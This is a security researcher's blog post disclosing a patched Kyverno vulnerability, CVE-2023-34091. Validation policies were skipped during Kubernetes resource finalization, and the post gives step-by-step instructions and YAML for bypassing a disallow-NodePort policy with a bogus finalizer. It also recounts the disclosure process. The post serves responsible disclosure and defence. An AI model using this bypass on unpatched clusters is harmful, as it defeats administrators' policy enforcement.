Kyverno CVE-2023-34091: Bypassing policies using Kubernetes finalizers

Blake Burkhart
Defense Unicorns
Jun 13, 2023 · 7 min read


In security research, it's crucial to adopt an attacker mindset and explore the unexpected. This post walks through how I stumbled across a security bug in Kyverno, a Kubernetes admission webhook server used for validating and mutating resources with customizable policies. It began with a seemingly innocuous experiment: implementing a finalizer using Kyverno, only to discover that Kyverno ignored resources with a deletionTimestamp set. That could have been the end of the story, but curiosity led to an exploitable vulnerability in how policies are enforced during resource deletion, and a reminder of why security research matters in open-source software development.

How to stumble across security bugs

  1. Always think like an attacker
  2. Do silly things with software (this ends up exercising weird combinations of features)
  3. When it doesn't work (because you were doing something ridiculous), figure out if there's a bug
  4. With an attacker mindset, consider if the bug is exploitable

Specifically, I decided to try implementing a finalizer using Kyverno (a Kubernetes admission webhook server with customizable policies for validating and mutating resources) by writing a ClusterPolicy to match resources with a deletionTimestamp. This is a silly thing to use Kyverno for but could have been useful for writing a proof of concept finalizer without writing any code. It turns out that this was impossible because Kyverno ignored resources with a deletionTimestamp set.
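For illustration, the kind of ClusterPolicy I had in mind might have looked roughly like the following. This is a hypothetical sketch with made-up names, not the actual policy I wrote; it tries to match resources that are mid-deletion and, per the behavior described above, never triggered:

```yaml
# Hypothetical sketch: deny UPDATEs on resources that are being finalized.
# Names and the matched kind are illustrative.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: poc-finalizer
spec:
  validationFailureAction: Enforce
  rules:
    - name: match-deleting-resources
      match:
        any:
          - resources:
              kinds:
                - ConfigMap
      preconditions:
        all:
          # Only apply when .metadata.deletionTimestamp is set.
          - key: "{{ request.object.metadata.deletionTimestamp || '' }}"
            operator: NotEquals
            value: ""
      validate:
        message: "This resource is currently being finalized."
        deny:
          conditions:
            all:
              - key: "{{ request.operation }}"
                operator: Equals
                value: UPDATE
```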

Now, this could just be the end of my idea to implement a finalizer with Kyverno… but I asked, "what's the impact of not performing validation on these resources?" I tried to see if this was somehow exploitable… it looked like Kyverno would sometimes not enforce validation policies, which sounded scary.

A quick refresher on how deletion works in Kubernetes

  1. A Kubernetes API client performs an HTTP DELETE on a resource.
  2. If .metadata.finalizers[] in the resource is empty or doesn't exist, the Kubernetes API will remove the resource immediately.

    — Webhooks will see one DELETE operation on the resource.
  3. If .metadata.finalizers[] is not empty, instead of removing the resource, the Kubernetes API will update the resource with .metadata.deletionTimestamp set to the current time.

    — Webhooks will see the same DELETE operation on the resource as above; .metadata.deletionTimestamp will not yet be set. This corresponds to the user's Kubernetes API request.

    — If changes are made to the resource during deletion, Webhooks will see UPDATE operations on the resource with .metadata.deletionTimestamp set.

    — A controller implementing a finalizer will notice the added .metadata.deletionTimestamp and begin whatever finalization steps it needs to do. When it finishes, it will update the resource to remove its finalizer key from .metadata.finalizers[].

    — A well-behaved controller probably should ignore anything changed inside .spec if .metadata.deletionTimestamp is non-nil.
  4. When .metadata.finalizers[] is eventually (updated to) an empty list, the Kubernetes API will actually remove the resource.

    — Webhooks will see an UPDATE operation on the resource previously deleted. The only indication in the AdmissionReview that this UPDATE is on a previously deleted resource and will result in removal is that .metadata.deletionTimestamp is present and .metadata.finalizers[] is being removed. Again, this corresponds to the Kubernetes API request (likely from the controller implementing the finalizer in this case).

If you want to observe this process yourself, set the --dumpPayload=true flag on Kyverno's admission controller and grep the logs for a resource as you delete it.
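The deletion flow above can also be sketched as a toy model. This is purely illustrative Python, not the API server's actual code, but it captures the two paths: immediate removal versus lingering with a deletionTimestamp until the finalizer list empties:

```python
# Toy model of the Kubernetes deletion flow described above.
from datetime import datetime, timezone

def handle_delete(resource):
    """Simulate an HTTP DELETE. Returns (webhook_operation_seen, resource_or_None)."""
    meta = resource.setdefault("metadata", {})
    if not meta.get("finalizers"):
        # No finalizers: the API server removes the resource immediately.
        return "DELETE", None
    # Finalizers present: only deletionTimestamp is set; the resource stays.
    meta["deletionTimestamp"] = datetime.now(timezone.utc).isoformat()
    return "DELETE", resource

def remove_finalizer(resource, name):
    """Simulate a controller removing its finalizer key after finalization.

    Webhooks see this as an UPDATE; when the list empties on a resource with a
    deletionTimestamp, the API server actually removes the resource.
    """
    meta = resource["metadata"]
    meta["finalizers"] = [f for f in meta["finalizers"] if f != name]
    if not meta["finalizers"] and meta.get("deletionTimestamp"):
        return None  # resource is really gone now
    return resource
```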

It seemed like Kyverno's behavior of ignoring resources with deletionTimestamp set was a bug and potentially exploitable, but I tried a few resource kinds, and at first, I was unable to exploit anything. Some resource kinds (e.g. Pods) are mostly immutable: an update isn't allowed to edit most of the fields in .spec. Some resource kinds (e.g. Pods, but also Deployments, StatefulSets, DaemonSets, etc) ignore changes to .spec during deletion (for example, upon deletion, a Pod begins termination of the container and ignores all further updates). Also, deletion usually happens very quickly, and there's no opportunity to update the resource during deletion.

So… how is this bug exploitable?

Indeed, Kyverno does not enforce any policies on UPDATE operations on resources if .metadata.deletionTimestamp is non-nil.
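In pseudocode terms, the flawed decision amounted to something like this. Kyverno is written in Go and this is not its actual logic, just a hypothetical sketch of the buggy predicate:

```python
# Hypothetical sketch of the vulnerable admission decision (not Kyverno's code):
# any operation on a resource with deletionTimestamp set was skipped, even
# though UPDATEs during finalization can still change .spec.
def should_apply_policies(operation, resource):
    meta = resource.get("metadata", {})
    if meta.get("deletionTimestamp") is not None:
        return False  # the bug: policies silently skipped during finalization
    return operation in ("CREATE", "UPDATE")
```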

It's possible to add a bogus non-existent bburky.com/hax finalizer to a resource's .metadata.finalizers[]. Because nothing implements this finalizer, deletion of a resource may be delayed indefinitely.

  • Perhaps it is possible to race an existing finalizer, but this trick makes the exploit very reliable.
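The trick itself is just a metadata entry, e.g.:

```yaml
# A fragment of the resource's metadata: an arbitrary finalizer key that no
# controller implements, so the resource can never finish deleting on its own.
metadata:
  finalizers:
    - bburky.com/hax
```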

Most, but not all, controllers ignore changes to the .spec after deletion begins.

  • Notably, Pods begin termination as soon as .metadata.deletionTimestamp is set. Even though .spec.containers[].image is mutable, UPDATE operations are ignored during deletion.
    This does limit the impact of this vulnerability. It is very common to use Kyverno to implement policies on Pods. These policies are unaffected by this exploit.
  • Some resources don't really have a controller at all. ConfigMaps, for example, have no controller of their own; instead, controllers of other resources such as Pods consume them. It turns out that you can actually mount a ConfigMap that is being deleted into a Pod's .spec.volumes, and updates to it will be reflected in the filesystem.
  • CRDs have their own custom controllers, and they should check for .metadata.deletionTimestamp... but not all of them do. Kubebuilder's scaffold templates do correctly check it, but controllers that manually implement Reconcile() using controller-runtime might forget to implement this check.
  • It's possible that the built-in Kubernetes controllers have bugs or inconsistent behavior. After some research I discovered that during finalization, updates to LoadBalancer Services may be ignored and remain pending. However, NodePort Services updated during finalization will create a listening NodePort.

I decided this weird behavior of NodePorts best demonstrated the Kyverno bug's exploitability. Kyverno provides a "best practices" Disallow NodePort policy; if I could find a way to create a NodePort Service with this policy in place, I would have demonstrated a vulnerability.

And… it actually worked:

  1. Create a Service with an allowed type like ClusterIP
  2. Maliciously add a non-existent finalizer to the Service and delete the Service.
  3. Update the Service to change its type to NodePort.
    This is the vulnerability in Kyverno: it should still enforce validation policies, even during deletion.
  4. Test access to the Service via the NodePort to demonstrate that Kubernetes NodePorts are applied even during deletion.
    This is arguably a bug in Kubernetes but is not a security bug in Kubernetes. Kyverno is a generic policy tool and should not assume any particular behavior of resources.
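Concretely, the Service from step 1 might look like this (illustrative names; the actual proof of concept is in the gist linked below):

```yaml
# Step 1: a Service of an allowed type, pre-loaded with a bogus finalizer so
# that deletion stalls indefinitely (step 2). With the vulnerable Kyverno,
# updating .spec.type to NodePort (step 3) was then accepted, because policies
# were skipped for resources mid-deletion.
apiVersion: v1
kind: Service
metadata:
  name: victim
  finalizers:
    - bburky.com/hax   # nothing implements this finalizer
spec:
  type: ClusterIP
  selector:
    app: victim
  ports:
    - port: 80
```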

Vulnerability Reporting

Following the process in Kyverno's SECURITY.md, I sent the following report and proof of concept exploit to kyverno-security@googlegroups.com:

validationFailureAction: Enforce policies may be bypassed by editing resources during finalization
https://gist.github.com/bburky/c137b39dd2ec48c9efd818af7507465e

The Kyverno team responded promptly and immediately started working on a fix to include in the then-upcoming v1.10.0 major update. The fix was initially done in a public GitHub PR (but without any notes about security impact) and included in an alpha release. I was notified of the fix via email and was able to test the patch before the update and security advisory was released. I reported that the fix was incomplete, and a second patch was added that fully resolved the issue. The Kyverno v1.10.0 release resolves this vulnerability and includes both patches. Kyverno converted my proof of concept exploit into a unit test, which I thought was great.

A security advisory was issued after the v1.10.0 release. The advisory rates the severity as "low," which I concur with for policies on Pods, for which there is no security impact. However, the impact may be much higher if you use policies on some built-in kinds (such as Services or ConfigMaps) or policies on Custom Resources if they apply updates during deletion.

This is a good response overall. All software has bugs, but this issue was handled well and resolved appropriately. The vulnerability was fixed within a reasonable timeframe, and I was always kept informed of the progress.

Reporting timeline (Me ➡️ Kyverno):

Thank you to the Kyverno team, especially Chip Zoller, for your help getting this fixed, and congratulations on releasing the 1.10.0 update with lots of new features too.

This specific issue only applied to Kyverno, but it is possible for similar vulnerabilities to exist in other admission webhooks. I did find multiple cases of various controllers and resource kinds (including some built-in to Kubernetes) with surprising behavior during deletion; any project doing similar policy enforcement should be careful not to assume any particular behavior of resources during deletion.

At Defense Unicorns, we believe in creating and supporting open-source software. In addition to releasing open-source software ourselves, we try to contribute back to the open-source community. Open source contributions usually mean new features, bug reports, or fixes, but they can also include security reviews of important software.

Kyverno is used as a Kubernetes policy-checking tool in Platform One's Big Bang to validate software is correctly configured to meet DoD DevSecOps Reference Architecture requirements. Cluster administrators might also use Kyverno to allow developers to safely deploy mission applications by using policies to enforce restrictions on what resources may be deployed. Security research like this is important to validate that our usage of tools like Kyverno correctly implements security controls as designed.
